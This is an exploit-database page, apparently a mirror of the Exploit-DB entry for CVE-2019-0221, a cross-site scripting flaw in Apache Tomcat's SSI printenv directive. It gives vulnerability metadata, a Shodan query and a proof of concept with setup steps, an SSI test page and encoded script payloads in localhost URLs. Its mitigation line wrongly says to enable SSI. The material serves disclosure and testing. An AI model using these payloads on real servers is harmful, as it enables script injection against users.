header-logo
Suggest Exploit
vendor:
Tomcat
by:
Central InfoSec
6,1
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: Tomcat
Affected Version From: Apache Tomcat 9.0.0.M1
Affected Version To: Apache Tomcat 7.0.93
Patch Exists: YES
Related CWE: CVE-2019-0221
CPE: a:apache:tomcat
Metasploit: https://www.rapid7.com/db/vulnerabilities/debian-cve-2019-0221/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2019-0221/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2019-0221/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp3-cve-2019-0221/https://www.rapid7.com/db/vulnerabilities/suse-cve-2019-0221/https://www.rapid7.com/db/vulnerabilities/oracle-solaris-cve-2019-0221/https://www.rapid7.com/db/vulnerabilities/gentoo-linux-cve-2019-0221/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp5-cve-2019-0221/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2019-0221/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp8-cve-2019-0221/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2019-0221/https://www.rapid7.com/db/vulnerabilities/apache-tomcat-cve-2019-0221/
Other Scripts: https://www.infosecmatter.com/nessus-plugin-library/?id=124064https://www.infosecmatter.com/nessus-plugin-library/?id=150581https://www.infosecmatter.com/nessus-plugin-library/?id=130547https://www.infosecmatter.com/nessus-plugin-library/?id=121231https://www.infosecmatter.com/nessus-plugin-library/?id=122836https://www.infosecmatter.com/nessus-plugin-library/?id=128332https://www.infosecmatter.com/nessus-plugin-library/?id=141207https://www.infosecmatter.com/nessus-plugin-library/?id=86710https://www.infosecmatter.com/nessus-plugin-library/?id=74364https://www.infosecmatter.com/nessus-plugin-library/?id=76146
Tags: apache,xss,tomcat,seclists,edb,cve,cve2019
CVSS Metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Nuclei References: https://seclists.org/fulldisclosure/2019/May/50https://wwws.nightwatchcybersecurity.com/2019/05/27/xss-in-ssi-printenv-command-apache-tomcat-cve-2019-0221/https://www.exploit-db.com/exploits/50119https://lists.apache.org/thread.html/6e6e9eacf7b28fd63d249711e9d3ccd4e0a83f556e324aee37be5a8c@announce.tomcat.apache.orghttps://nvd.nist.gov/vuln/detail/CVE-2019-0221
Nuclei Metadata: {'max-request': 2, 'shodan-query': 'title:"Apache Tomcat"', 'vendor': 'apache', 'product': 'tomcat'}
Platforms Tested: FireFox
2019

Apache Tomcat 9.0.0.M1 – Cross-Site Scripting (XSS)

Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93 are vulnerable to cross-site scripting because the SSI printenv command echoes user provided data without escaping. Note: SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.

Mitigation:

Enable SSI support within Apache Tomcat and ensure that the file with the “printenv” SSI directive is not accessible.
Source

Exploit-DB raw data:

# Exploit Title: Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)
# Date: 05/21/2019
# Exploit Author: Central InfoSec
# Version: Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39, and 7.0.0 to 7.0.93
# CVE : CVE-2019-0221

# Requirements:

# SSI support must be enabled within Apache Tomcat. SSI support is not enabled by default.

# A file (usually "*.shtml") with the "printenv" SSI directive must exist within the web application.

# The file must be accessible.



# Proof of Concept:

# Install a Java Runtime Environment (JRE)

# Download a vulnerable version of Tomcat and extract the contents

# Modify line 19 of the conf\context.xml file to globally enable privileged context
Context privileged="true">

# Modify conf\web.xml to enable the SSI Servlet as per the Apache Tomcat User Guide

# Put the following code in "webapps/ROOT/ssi/printenv.shtml"
<html>
  <body>
    Echo: <!-- #echo var="QUERY_STRING_UNESCAPED" --> <br/> <br/>
    Printenv: <!-- #printenv -->
  </body>
</html>

# Run Tomcat
cd bin
catalina run

# Call the following URLs to observe the XSS. You may need to use FireFox. Observe the difference between the "echo" directive which escapes properly and the "printenv" directive which does not escape properly
http://localhost:8080/ssi/printenv.shtml?%3Cbr/%3E%3Cbr/%3E%3Ch1%3EXSS%3C/h1%3E%3Cbr/%3E%3Cbr/%3E
http://localhost:8080/printenv.shtml?%3Cscript%3Ealert(%27xss%27)%3C/script%3E

Navigation

Suggest Exploit

Services By CQR